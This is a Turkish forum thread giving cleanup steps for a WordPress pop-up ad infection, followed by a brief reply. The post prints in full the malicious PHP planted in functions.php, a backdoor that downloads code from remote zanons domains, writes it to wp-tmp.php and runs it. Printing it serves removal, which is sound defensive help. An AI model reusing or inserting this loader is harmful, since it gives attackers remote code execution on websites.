Wordpress POP-UP Reklam Sorunu Çözümü

26-06-2020, 17:01:06

Eklentiler arayıcılığıyla veya doğrudan temalar ile bu virüs temanın functions.php dosyasına bir kod yazdırıyor. Ardından bu kod sayesinde wp-includes dosyası içerisine wp-tmp.php ve wp-vcd.phpisminde dosyalar gönderiyor.

Öncelikle functions.php dosyasını bilgisayarınıza indirip açın ve içerisinde bulunan aşağıdaki kodu silin.

<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; $div_code_name = "wp_vcd";$funcfile = __FILE__;if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?phpn" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?phpn" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(get_template_directory() . '/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span> } } } } elseif ($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); <span class="userTag"><span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span></span> if (!file_exists(get_template_directory() . '/wp-tmp.php')) { <span class="userTag"><span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span></span> } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = <span class="userTag"><span class="userTag"><span class="userTag">@file_get_contents("</span></span></span>http://www.zanons.xyz/code.php") OR $tmpcontent = <span class="userTag"><span class="userTag">@file_get_contents_tcurl("</span></span>http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } }} ?>

Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı bulup silerseniz sorunu gidermiş olursunuz.

26-06-2020, 17:45:47

#2

StabilBey

) Yararlı Ama etkisi bir yere kadaR )